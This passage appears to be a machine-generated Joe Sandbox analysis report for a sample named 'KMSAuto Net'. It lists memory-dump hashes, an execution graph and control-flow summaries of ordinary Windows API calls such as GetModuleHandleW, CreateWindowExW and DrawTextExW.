                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe93bfcd9158faa8c00da4e9f32d0b20577b1cbc1f0c38ad72f46926000780c7
                                                                    • Instruction ID: b03d9a9b39a7da2c66e1161dc44964ad18036ac87affdce31a534004a2cc065d
                                                                    • Opcode Fuzzy Hash: fe93bfcd9158faa8c00da4e9f32d0b20577b1cbc1f0c38ad72f46926000780c7
                                                                    • Instruction Fuzzy Hash: 74111F7E3B0D0607A75C8769AC73ABD21C1E3843087C8A53CF69BC62D1EE6D9495C10D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 046C51B7 Relevance: .1, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d500e99f8a94672710fdab3da84f4ff88beaa55a68f080d6b94a73964fb8a436
                                                                    • Instruction ID: 648a44d9ab036f68ae4d78b5d0b44b46e6810078e73c9c450a1b1abfd4f036d5
                                                                    • Opcode Fuzzy Hash: d500e99f8a94672710fdab3da84f4ff88beaa55a68f080d6b94a73964fb8a436
                                                                    • Instruction Fuzzy Hash: 1E21F5329006355BCB02CE6EE8845A7F3D1FBC436AF17473AED8567690D638B814C6E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 046C5292 Relevance: .1, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                    • Instruction ID: 3446dfe45843fe060c6729c922912dd58e8656c16347771fe04eb95af6f075f9
                                                                    • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                    • Instruction Fuzzy Hash: 492137725144355BC305DF2DE888677B3E1FFD4319F978A2AD9878B281E628F405DA90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:10%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:308
                                                                    Total number of Limit Nodes:22
                                                                    execution_graph 34960 5136fc0 34962 5136fd3 34960->34962 34963 5134ed0 LoadLibraryExW GetModuleHandleW 34960->34963 34963->34962 34881 125dda0 SetWindowLongW 34882 125de0c 34881->34882 34883 51596d0 34884 51596ff 34883->34884 34885 5159740 34884->34885 34888 5159712 34884->34888 34890 5159778 34884->34890 34893 5158548 34885->34893 34886 51597b0 34887 5158548 3 API calls 34886->34887 34891 5159760 34887->34891 34890->34886 34892 5158548 3 API calls 34890->34892 34892->34886 34894 5158553 34893->34894 34895 51598e0 34894->34895 34900 5159b00 34894->34900 34907 515df00 34894->34907 34911 515df10 34894->34911 34895->34891 34896 51598aa 34896->34891 34901 5159b2f 34900->34901 34902 5159bb6 34901->34902 34904 5159bdd 34901->34904 34906 5159bc5 34901->34906 34915 51585ec 34902->34915 34905 5159c41 KiUserCallbackDispatcher 34904->34905 34904->34906 34905->34906 34908 515df10 34907->34908 34909 5159b00 3 API calls 34908->34909 34910 515df65 34909->34910 34910->34896 34912 515df23 34911->34912 34913 5159b00 3 API calls 34912->34913 34914 515df65 34913->34914 34914->34896 34916 51585f7 34915->34916 34917 515a3aa 34916->34917 34922 513e353 34916->34922 34926 125ba98 34916->34926 34934 51554d8 34916->34934 34937 51554c9 34916->34937 34917->34906 34941 513e371 34922->34941 34945 513e380 34922->34945 34923 513e35e 34923->34917 34927 125babb 34926->34927 34928 125bad3 34927->34928 34948 125bd21 34927->34948 34952 125bd30 34927->34952 34928->34917 34929 125bcd0 GetModuleHandleW 34931 125bcfd 34929->34931 34930 125bacb 34930->34928 34930->34929 34931->34917 34936 125ba98 2 API calls 34934->34936 34935 51554e6 34935->34917 34936->34935 34938 51554d2 34937->34938 34939 51554e6 34937->34939 34938->34939 34940 125ba98 2 API calls 34938->34940 34939->34917 34940->34939 34942 513e380 34941->34942 34944 125ba98 2 API calls 34942->34944 34943 513e38e 34943->34923 34944->34943 34947 125ba98 2 API calls 34945->34947 34946 513e38e 34946->34923 34947->34946 34949 125bd30 34948->34949 34951 125bd69 34949->34951 34956 125afb8 34949->34956 34951->34930 34953 125bd44 34952->34953 34954 125bd69 34953->34954 34955 125afb8 LoadLibraryExW 34953->34955 34954->34930 34955->34954 34957 125bf10 LoadLibraryExW 34956->34957 34959 125bf89 34957->34959 34959->34951 34964 1256a70 GetCurrentProcess 34965 1256ae3 34964->34965 34966 1256aea GetCurrentThread 34964->34966 34965->34966 34967 1256b27 GetCurrentProcess 34966->34967 34968 1256b20 34966->34968 34969 1256b5d 34967->34969 34968->34967 34970 1256b85 GetCurrentThreadId 34969->34970 34971 1256bb6 34970->34971 34972 12562b0 34976 12563a7 34972->34976 34981 12562e0 34972->34981 34973 12562c0 34977 12563ac 34976->34977 34978 1256411 34977->34978 34986 1256948 34977->34986 34990 1256958 34977->34990 34978->34973 34982 125631a 34981->34982 34983 1256411 34982->34983 34984 1256948 6 API calls 34982->34984 34985 1256958 6 API calls 34982->34985 34983->34973 34984->34983 34985->34983 34988 1256965 34986->34988 34987 125699f 34987->34978 34988->34987 34994 1256768 34988->34994 34992 1256965 34990->34992 34991 125699f 34991->34978 34992->34991 34993 1256768 6 API calls 34992->34993 34993->34991 34995 1256773 34994->34995 34997 1257290 34995->34997 34998 1256864 34995->34998 34997->34997 34999 125686f 34998->34999 35014 1256874 34999->35014 35001 12572ff 35020 1259911 35001->35020 35031 1259920 35001->35031 35042 12598a0 35001->35042 35053 1259b24 35001->35053 35002 125730d 35003 1256894 GetFocus KiUserCallbackDispatcher LoadLibraryExW GetModuleHandleW 35002->35003 35004 1257327 35003->35004 35005 12568a4 LoadLibraryExW GetModuleHandleW 35004->35005 35006 125732e 35005->35006 35008 125b710 LoadLibraryExW GetModuleHandleW 35006->35008 35009 125b6f8 LoadLibraryExW GetModuleHandleW 35006->35009 35007 1257338 35007->34997 35008->35007 35009->35007 35015 125687f 35014->35015 35016 12579de 35015->35016 35017 513e353 2 API calls 35015->35017 35018 51554c9 2 API calls 35015->35018 35019 51554d8 2 API calls 35015->35019 35016->35001 35017->35016 35018->35016 35019->35016 35021 12598a6 35020->35021 35021->35020 35024 1259977 35021->35024 35027 1259c2a 35021->35027 35058 1258700 35021->35058 35023 1259a1f 35028 1259a8b 35023->35028 35062 12568a4 35023->35062 35024->35023 35026 1259a1a KiUserCallbackDispatcher 35024->35026 35024->35028 35026->35023 35028->35027 35066 125a5d8 35028->35066 35070 125a5c7 35028->35070 35032 125994e 35031->35032 35033 1258700 GetFocus 35032->35033 35036 1259977 35032->35036 35038 1259c2a 35032->35038 35033->35036 35034 1259a1f 35035 1259a8b 35034->35035 35037 12568a4 2 API calls 35034->35037 35035->35038 35040 125a5c7 2 API calls 35035->35040 35041 125a5d8 2 API calls 35035->35041 35036->35034 35036->35035 35039 1259a1a KiUserCallbackDispatcher 35036->35039 35037->35035 35039->35034 35040->35038 35041->35038 35043 12598a6 35042->35043 35044 1258700 GetFocus 35043->35044 35046 1259977 35043->35046 35049 1259c2a 35043->35049 35044->35046 35045 1259a1f 35047 12568a4 2 API calls 35045->35047 35050 1259a8b 35045->35050 35046->35045 35048 1259a1a KiUserCallbackDispatcher 35046->35048 35046->35050 35047->35050 35048->35045 35050->35049 35051 125a5c7 2 API calls 35050->35051 35052 125a5d8 2 API calls 35050->35052 35051->35049 35052->35049 35055 1259b41 35053->35055 35054 1259c2a 35055->35054 35056 125a5c7 2 API calls 35055->35056 35057 125a5d8 2 API calls 35055->35057 35056->35054 35057->35054 35059 125870b 35058->35059 35074 125959c 35059->35074 35061 1259f35 35061->35024 35063 12568af 35062->35063 35078 125ae88 35063->35078 35065 125b53f 35065->35028 35067 125a5f5 35066->35067 35068 12568a4 2 API calls 35067->35068 35069 125a639 35067->35069 35068->35069 35069->35027 35071 125a5f5 35070->35071 35072 12568a4 2 API calls 35071->35072 35073 125a639 35071->35073 35072->35073 35073->35027 35075 12595a7 35074->35075 35076 1259ff0 GetFocus 35075->35076 35077 1259fe9 35075->35077 35076->35077 35077->35061 35079 125ae93 35078->35079 35080 125b6b1 35079->35080 35081 125b612 35079->35081 35085 125b710 35079->35085 35092 125b6f8 35079->35092 35080->35065 35081->35080 35082 125ae88 2 API calls 35081->35082 35082->35081 35087 125b741 35085->35087 35088 125b78e 35085->35088 35086 125b74d 35086->35081 35087->35086 35089 513e353 2 API calls 35087->35089 35099 125ba58 35087->35099 35102 125ba48 35087->35102 35088->35081 35089->35088 35094 125b741 35092->35094 35095 125b78e 35092->35095 35093 125b74d 35093->35081 35094->35093 35096 513e353 2 API calls 35094->35096 35097 125ba48 2 API calls 35094->35097 35098 125ba58 2 API calls 35094->35098 35095->35081 35096->35095 35097->35095 35098->35095 35101 125ba98 2 API calls 35099->35101 35100 125ba62 35100->35088 35101->35100 35103 125ba56 35102->35103 35104 125ba06 35102->35104 35106 125ba98 2 API calls 35103->35106 35104->35088 35105 125ba62 35105->35088 35106->35105 35107 51580c0 35108 51580d7 35107->35108 35111 5155e94 35108->35111 35112 5155e9f 35111->35112 35121 5134f20 35112->35121 35125 513da4b 35112->35125 35113 51586c1 35129 515200c 35113->35129 35115 5158893 35133 515b358 35115->35133 35139 515b347 35115->35139 35116 5158162 35122 5134f2b 35121->35122 35144 5134f40 35122->35144 35126 513da50 35125->35126 35127 5134f40 2 API calls 35126->35127 35128 513daaa 35127->35128 35128->35113 35130 5152017 35129->35130 35131 5158548 3 API calls 35130->35131 35132 5159ae7 35131->35132 35132->35115 35134 515b378 35133->35134 35136 515b3e7 35133->35136 35135 515b3d3 35134->35135 35155 515d770 35134->35155 35159 515d780 35134->35159 35135->35116 35136->35116 35140 515b34b 35139->35140 35141 515b3d3 35140->35141 35142 515d770 3 API calls 35140->35142 35143 515d780 3 API calls 35140->35143 35141->35116 35142->35141 35143->35141 35145 5134f4b 35144->35145 35147 1256874 2 API calls 35145->35147 35149 1257740 35145->35149 35146 513daaa 35146->35113 35147->35146 35150 1257743 35149->35150 35151 12579de 35150->35151 35152 513e353 2 API calls 35150->35152 35153 51554c9 2 API calls 35150->35153 35154 51554d8 2 API calls 35150->35154 35151->35146 35152->35151 35153->35151 35154->35151 35156 515d780 35155->35156 35158 515d7b4 35156->35158 35163 5152248 35156->35163 35158->35135 35160 515d7af 35159->35160 35162 515d7b4 35159->35162 35161 5152248 3 API calls 35160->35161 35160->35162 35161->35162 35162->35135 35164 5152253 35163->35164 35165 515dc17 35164->35165 35169 515a583 35164->35169 35174 515a590 35164->35174 35165->35158 35166 515dc04 35166->35158 35170 515a5b7 35169->35170 35171 515a58b 35169->35171 35170->35166 35171->35170 35179 515dc38 35171->35179 35183 515dc48 35171->35183 35175 515a5b3 35174->35175 35176 515a5b7 35175->35176 35177 515dc38 3 API calls 35175->35177 35178 515dc48 3 API calls 35175->35178 35176->35166 35177->35176 35178->35176 35180 515dc48 35179->35180 35186 515ab38 35180->35186 35182 515dc58 35182->35170 35184 515ab38 3 API calls 35183->35184 35185 515dc58 35184->35185 35185->35170 35187 515ab43 35186->35187 35188 515de15 35187->35188 35192 515ab58 35187->35192 35190 515de35 35188->35190 35191 515ab58 3 API calls 35188->35191 35190->35182 35191->35190 35193 515ab63 35192->35193 35194 5158548 3 API calls 35193->35194 35195 515def6 35194->35195 35195->35188 35196 125ff79 35199 51525a8 35196->35199 35197 125ff90 35200 51525cd 35199->35200 35201 515267e 35199->35201 35204 5152c00 35200->35204 35201->35197 35206 5152c21 35204->35206 35205 5152612 35205->35197 35206->35205 35211 5154600 35206->35211 35218 5154660 35206->35218 35224 5154650 35206->35224 35207 5152ca1 35212 515460e 35211->35212 35214 5154667 35211->35214 35212->35207 35213 5154699 35213->35207 35214->35213 35230 51551f7 35214->35230 35234 5155208 35214->35234 35215 51547ac 35215->35207 35220 5154681 35218->35220 35219 5154699 35219->35207 35220->35219 35222 51551f7 DrawTextExW 35220->35222 35223 5155208 DrawTextExW 35220->35223 35221 51547ac 35221->35207 35222->35221 35223->35221 35226 5154681 35224->35226 35225 5154699 35225->35207 35226->35225 35228 51551f7 DrawTextExW 35226->35228 35229 5155208 DrawTextExW 35226->35229 35227 51547ac 35227->35207 35228->35227 35229->35227 35231 5155208 35230->35231 35237 5153b6c 35231->35237 35235 5153b6c DrawTextExW 35234->35235 35236 5155225 35235->35236 35236->35215 35238 5155240 DrawTextExW 35237->35238 35240 5155225 35238->35240 35240->35215 35241 515a408 35244 515a538 35241->35244 35245 515a559 35244->35245 35247 515a590 3 API calls 35245->35247 35248 515a583 3 API calls 35245->35248 35246 515a424 35247->35246 35248->35246 35249 125feb8 35250 125ff11 35249->35250 35251 1256874 2 API calls 35250->35251 35252 125ff4a 35251->35252 35257 125db58 35258 125dbc0 CreateWindowExW 35257->35258 35260 125dc7c 35258->35260 35261 1256c98 DuplicateHandle 35262 1256d2e 35261->35262

                                                                    Executed Functions

                                                                    Function 01256A61 Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3088 1256a61-1256ae1 GetCurrentProcess 3089 1256ae3-1256ae9 3088->3089 3090 1256aea-1256b1e GetCurrentThread 3088->3090 3089->3090 3091 1256b27-1256b5b GetCurrentProcess 3090->3091 3092 1256b20-1256b26 3090->3092 3094 1256b64-1256b7c 3091->3094 3095 1256b5d-1256b63 3091->3095 3092->3091 3106 1256b7f call 1257000 3094->3106 3107 1256b7f call 1257010 3094->3107 3108 1256b7f call 1256c20 3094->3108 3095->3094 3097 1256b85-1256bb4 GetCurrentThreadId 3099 1256bb6-1256bbc 3097->3099 3100 1256bbd-1256c1f 3097->3100 3099->3100 3106->3097 3107->3097 3108->3097
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 01256AD0
                                                                    • GetCurrentThread.KERNEL32 ref: 01256B0D
                                                                    • GetCurrentProcess.KERNEL32 ref: 01256B4A
                                                                    • GetCurrentThreadId.KERNEL32 ref: 01256BA3
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: a459e0f52ee480e9f8bb6e7f57e2238004bded815c6bf17bd20e52b276608ab7
                                                                    • Instruction ID: af760960fbc8024ec6001827b6732a2aa411bd46b797cc5e0f797ef8ea0bf85f
                                                                    • Opcode Fuzzy Hash: a459e0f52ee480e9f8bb6e7f57e2238004bded815c6bf17bd20e52b276608ab7
                                                                    • Instruction Fuzzy Hash: 025184B49002898FDB14CFAAD988BDEBFF1EF88304F248459E409B7250D775A884CF65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01256A70 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3109 1256a70-1256ae1 GetCurrentProcess 3110 1256ae3-1256ae9 3109->3110 3111 1256aea-1256b1e GetCurrentThread 3109->3111 3110->3111 3112 1256b27-1256b5b GetCurrentProcess 3111->3112 3113 1256b20-1256b26 3111->3113 3115 1256b64-1256b7c 3112->3115 3116 1256b5d-1256b63 3112->3116 3113->3112 3127 1256b7f call 1257000 3115->3127 3128 1256b7f call 1257010 3115->3128 3129 1256b7f call 1256c20 3115->3129 3116->3115 3118 1256b85-1256bb4 GetCurrentThreadId 3120 1256bb6-1256bbc 3118->3120 3121 1256bbd-1256c1f 3118->3121 3120->3121 3127->3118 3128->3118 3129->3118
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 01256AD0
                                                                    • GetCurrentThread.KERNEL32 ref: 01256B0D
                                                                    • GetCurrentProcess.KERNEL32 ref: 01256B4A
                                                                    • GetCurrentThreadId.KERNEL32 ref: 01256BA3
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: d7f415c631fdfe7cbd485d6d20d667ae95535967c604f7904ac9950733e1c181
                                                                    • Instruction ID: 0f5ca3f0d8c89a303bba95d69fb7cd22b2326cb17243f72df698896b4dec6f89
                                                                    • Opcode Fuzzy Hash: d7f415c631fdfe7cbd485d6d20d667ae95535967c604f7904ac9950733e1c181
                                                                    • Instruction Fuzzy Hash: B95165B49002498FDB14DFAAD988B9EBBF1FF48304F648459E419B7250D774A884CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0125BA98 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3130 125ba98-125babd call 125af60 3133 125bad3-125bad7 3130->3133 3134 125babf 3130->3134 3135 125bad9-125bae3 3133->3135 3136 125baeb-125bb2c 3133->3136 3184 125bac5 call 125bd21 3134->3184 3185 125bac5 call 125bd30 3134->3185 3135->3136 3141 125bb2e-125bb36 3136->3141 3142 125bb39-125bb47 3136->3142 3137 125bacb-125bacd 3137->3133 3138 125bc08-125bcc8 3137->3138 3179 125bcd0-125bcfb GetModuleHandleW 3138->3179 3180 125bcca-125bccd 3138->3180 3141->3142 3144 125bb49-125bb4e 3142->3144 3145 125bb6b-125bb6d 3142->3145 3147 125bb50-125bb57 call 125af6c 3144->3147 3148 125bb59 3144->3148 3146 125bb70-125bb77 3145->3146 3150 125bb84-125bb8b 3146->3150 3151 125bb79-125bb81 3146->3151 3149 125bb5b-125bb69 3147->3149 3148->3149 3149->3146 3155 125bb8d-125bb95 3150->3155 3156 125bb98-125bb9a call 125af7c 3150->3156 3151->3150 3155->3156 3159 125bb9f-125bba1 3156->3159 3161 125bba3-125bbab 3159->3161 3162 125bbae-125bbb3 3159->3162 3161->3162 3163 125bbb5-125bbbc 3162->3163 3164 125bbd1-125bbde 3162->3164 3163->3164 3166 125bbbe-125bbce call 1259800 call 125af8c 3163->3166 3171 125bc01-125bc07 3164->3171 3172 125bbe0-125bbfe 3164->3172 3166->3164 3172->3171 3181 125bd04-125bd18 3179->3181 3182 125bcfd-125bd03 3179->3182 3180->3179 3182->3181 3184->3137 3185->3137
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0125BCEE
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 56dc87714abeee999b418e4270878ee26ae11028c53a403341e63c2492ba2894
                                                                    • Instruction ID: a773ac23f2379626330ae870c1c46625a73cecf4a848c18d7f09ff32db194029
                                                                    • Opcode Fuzzy Hash: 56dc87714abeee999b418e4270878ee26ae11028c53a403341e63c2492ba2894
                                                                    • Instruction Fuzzy Hash: 92814670A10B068FD764DF2AC48576ABBF2FF88304F108A2AD986D7A50D775E805CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05159B00 Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3186 5159b00-5159b31 3188 5159b47-5159b4d 3186->3188 3189 5159b33-5159b40 3186->3189 3190 5159b4f-5159b55 3188->3190 3191 5159b6e-5159bb4 call 5159cff 3188->3191 3189->3188 3190->3191 3193 5159b57-5159b60 3190->3193 3202 5159bb6-5159bc0 call 51585ec 3191->3202 3203 5159bdd-5159be7 3191->3203 3193->3191 3194 5159b62-5159b68 3193->3194 3194->3191 3196 5159c63-5159c76 3194->3196 3197 5159c78-5159c90 call 5158558 3196->3197 3210 5159ce1 3197->3210 3211 5159c92-5159cda 3197->3211 3207 5159bc5-5159bd8 3202->3207 3203->3196 3205 5159be9-5159bf6 3203->3205 3208 5159c04-5159c0d 3205->3208 3209 5159bf8-5159bfe 3205->3209 3207->3197 3213 5159c0f-5159c15 3208->3213 3214 5159c1b-5159c5e KiUserCallbackDispatcher 3208->3214 3209->3208 3212 5159c00 3209->3212 3211->3210 3212->3208 3213->3214 3216 5159c17 3213->3216 3214->3196 3216->3214
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(00000014,?,?,03C6608C,02CAA8B8,?,00000000), ref: 05159C5E
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.518791870.0000000005150000.00000040.00000800.00020000.00000000.sdmp, Offset: 05150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_5150000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 466b1bb9cd3b03761ce74f1ba5c2a063d0e9f1df851a9e7366cfbcd83c3662ba
                                                                    • Instruction ID: d745325368b7b446961d23815ca68f7506f4839b06ee24af6ec0dad706e30c18
                                                                    • Opcode Fuzzy Hash: 466b1bb9cd3b03761ce74f1ba5c2a063d0e9f1df851a9e7366cfbcd83c3662ba
                                                                    • Instruction Fuzzy Hash: 3E717C74A11208EFCB55DF69D884DAEBBB6FF48624F114498F912AB361DB31EC81CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0125DB4C Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3225 125db4c-125dbbe 3226 125dbc0-125dbc6 3225->3226 3227 125dbc9-125dbd0 3225->3227 3226->3227 3228 125dbd2-125dbd8 3227->3228 3229 125dbdb-125dc13 3227->3229 3228->3229 3230 125dc1b-125dc7a CreateWindowExW 3229->3230 3231 125dc83-125dcbb 3230->3231 3232 125dc7c-125dc82 3230->3232 3236 125dcbd-125dcc0 3231->3236 3237 125dcc8 3231->3237 3232->3231 3236->3237 3238 125dcc9 3237->3238 3238->3238
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0125DC6A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: e20b852575e3aa89b24b1210fe3f25245874de111722d43f6ec8cf409bcbb772
                                                                    • Instruction ID: 0ffa33114d8536c3783dab7fbf4de41ccafa4dc095bc51db9bca96d7a67f99cb
                                                                    • Opcode Fuzzy Hash: e20b852575e3aa89b24b1210fe3f25245874de111722d43f6ec8cf409bcbb772
                                                                    • Instruction Fuzzy Hash: 4651C1B5D10309DFDB14CF99C984ADDBFB6BF48314F24862AE819AB210D7B49885CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0125DB58 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3239 125db58-125dbbe 3240 125dbc0-125dbc6 3239->3240 3241 125dbc9-125dbd0 3239->3241 3240->3241 3242 125dbd2-125dbd8 3241->3242 3243 125dbdb-125dc7a CreateWindowExW 3241->3243 3242->3243 3245 125dc83-125dcbb 3243->3245 3246 125dc7c-125dc82 3243->3246 3250 125dcbd-125dcc0 3245->3250 3251 125dcc8 3245->3251 3246->3245 3250->3251 3252 125dcc9 3251->3252 3252->3252
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0125DC6A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: a64f9d1d1bdc0fde66082e91d1fc41e69fe9b7e3842dffe29fed06c0fcfb2801
                                                                    • Instruction ID: 5d4e8d00a05f2f0045d5c0ba62c97a5886ae3ad60c3003b2d06f3a6ca4ad6e85
                                                                    • Opcode Fuzzy Hash: a64f9d1d1bdc0fde66082e91d1fc41e69fe9b7e3842dffe29fed06c0fcfb2801
                                                                    • Instruction Fuzzy Hash: 5C41C2B1D10309DFDB14CF9AC984ADEBFB6BF48314F24862AE819AB210D7759845CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05153B6C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3253 5153b6c-515528c 3255 5155297-51552a6 3253->3255 3256 515528e-5155294 3253->3256 3257 51552a8 3255->3257 3258 51552ab-51552e4 DrawTextExW 3255->3258 3256->3255 3257->3258 3259 51552e6-51552ec 3258->3259 3260 51552ed-515530a 3258->3260 3259->3260
                                                                    APIs
                                                                    • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05155225,?,?), ref: 051552D7
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.518791870.0000000005150000.00000040.00000800.00020000.00000000.sdmp, Offset: 05150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_5150000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: DrawText
                                                                    • String ID:
                                                                    • API String ID: 2175133113-0
                                                                    • Opcode ID: 102391b3830285d907bbc0bcbd78d74f1aa35d6af53642bc0e0ea182d2a0c771
                                                                    • Instruction ID: 7896e96c3aac4a185efbf6831a83881b934a9a07ce6d5779fc3855be115f3cc6
                                                                    • Opcode Fuzzy Hash: 102391b3830285d907bbc0bcbd78d74f1aa35d6af53642bc0e0ea182d2a0c771
                                                                    • Instruction Fuzzy Hash: A531C3B5900209DFDB10CF9AD884ADEBBF6FB48324F55842EE819A7310D775A944CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05155238 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3263 5155238-515528c 3264 5155297-51552a6 3263->3264 3265 515528e-5155294 3263->3265 3266 51552a8 3264->3266 3267 51552ab-51552e4 DrawTextExW 3264->3267 3265->3264 3266->3267 3268 51552e6-51552ec 3267->3268 3269 51552ed-515530a 3267->3269 3268->3269
                                                                    APIs
                                                                    • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05155225,?,?), ref: 051552D7
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.518791870.0000000005150000.00000040.00000800.00020000.00000000.sdmp, Offset: 05150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_5150000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: DrawText
                                                                    • String ID:
                                                                    • API String ID: 2175133113-0
                                                                    • Opcode ID: 99933e4d16769d6f8c6c192903dd8bce702274893e4467ea59857398cdee7105
                                                                    • Instruction ID: b8e2a146a02e6b8a85f9dae1d17f43cd988d13567e10f48160c00c87a3d49cde
